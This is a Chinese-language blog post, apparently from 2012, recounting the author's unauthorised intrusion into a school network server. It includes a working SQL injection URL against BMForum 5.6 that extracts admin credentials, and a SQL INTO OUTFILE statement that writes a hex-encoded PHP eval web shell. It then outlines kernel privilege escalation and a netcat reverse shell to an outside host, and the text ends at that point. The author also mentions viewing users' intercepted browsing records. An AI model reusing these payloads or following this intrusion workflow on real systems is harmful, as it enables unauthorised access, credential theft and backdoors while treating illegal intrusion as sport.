linux系統(tǒng)從入侵到提權(quán)的詳細(xì)過程(圖文)

發(fā)布時(shí)間：2012-06-13 10:07:04 作者：佚名

本文詳細(xì)介紹了linux下的入侵過程

前奏：無意間拿下了學(xué)校一臺(tái)檢測網(wǎng)絡(luò)訪問的服務(wù)器，無意間看到一個(gè)遠(yuǎn)程登錄的信息，遂對此網(wǎng)段掃描了一下80端口。。。

上個(gè)J8，就是那個(gè)上網(wǎng)檢測東西。。

其實(shí)記錄的很詳細(xì)，沒有加密的聊天內(nèi)容都可以看到。我還是比較尊重他人隱私的，所以只查看了一些上網(wǎng)行為。

剛才說了，掃了一下那個(gè)網(wǎng)段的80端口，有一個(gè)開著，就點(diǎn)進(jìn)去看了一下，是BMForum 2007 5.6的論壇，php的。

老系統(tǒng)了，記得前幾年爆了個(gè)注入，也不知道是不是這個(gè)版本，上db-exploit看了一下，艸，中槍了。

————————-下面的來自db-exploit————————

BMForum 5.6 (tagname) Remote SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Date found: 30.09.08
Product: BMForum
Version: 5.6
URL: www.bmforum.com
Vulnerability Class: SQL Injection
Condition: magic_quotes_gpc = Off

Exploit:

http://localhost/[installdir]/plugins.php?p=tags&forumid=0&tagname=-1′+union+select+1,concat_ws(0x3a,username,pwd),3,4+from+bmb_userlist+where+userid=1/*

# milw0rm.com [2008-10-01]

于是乎….

不用猜你就懂了，密碼是admin。

進(jìn)后臺(tái)了，這個(gè)模式我不是很喜歡，翻了半天沒找到能上傳的地方。上J8。

不過，還是好好找，依然能找到可以利用的東西，發(fā)現(xiàn)了這個(gè)后臺(tái)有phpinfo()和SQL執(zhí)行。

看了一下，是root權(quán)限，也得到了web目錄，如果沒開啟魔術(shù)引號，可以考慮into outfile。

補(bǔ)一句：mysql的root權(quán)限在linux下一般沒什么用，有寫權(quán)限就不錯(cuò)了，如果是windows系統(tǒng)，可以考慮導(dǎo)出udf.dll。

管理員百密一疏啊，沒開魔術(shù)引號~~蛤蛤，大快人心??！~

直接select一句話木馬，然后導(dǎo)出到文件~~

下面那一段十六進(jìn)制字符串是chabaoo.cn <?php eval($_REQUEST[fuck]);?> 的hex值

select 0x3C3F706870206576616C28245F524551554553545B6675636B5D293B3F3E into outfile ‘/usr/local/bmf/bmb/datafile/x.php’

然后成功得到shell。如圖。

接下來，試試菜刀里能不能執(zhí)行命令，下面就要考慮提權(quán)了。

試了一下，看似可以執(zhí)行命令，也得到了一些服務(wù)器信息。

2.6.9-22的內(nèi)核，有溢出。

這個(gè)終端有個(gè)毛病，就是不能即時(shí)回顯，畢竟是通過webshell虛擬的終端，所以，還需要nc來反彈一個(gè)shell，用于溢出。

這個(gè)服務(wù)器上已經(jīng)裝了nc，可是是閹割過的，不能指向bash，所以，下載源碼，編譯。

用wget在sourceforge.net上下載，就不多說了。。

編譯什么的，也是so easy。實(shí)在不行就百度一個(gè)i386架構(gòu)下編譯的linux版netcat。

下面的工作就是要反彈shell了，一臺(tái)外網(wǎng)的機(jī)子是必須的，就算不是外網(wǎng)，能映射也行。

剛好手頭有個(gè)映射過端口的服務(wù)器，如果是外網(wǎng)服務(wù)器，就更簡單了，詳見netcat使用幫助。

http://wenku.baidu.com/view/f77334ee19e8b8f67c1cb9fe.html

好了，開始反彈吧。。。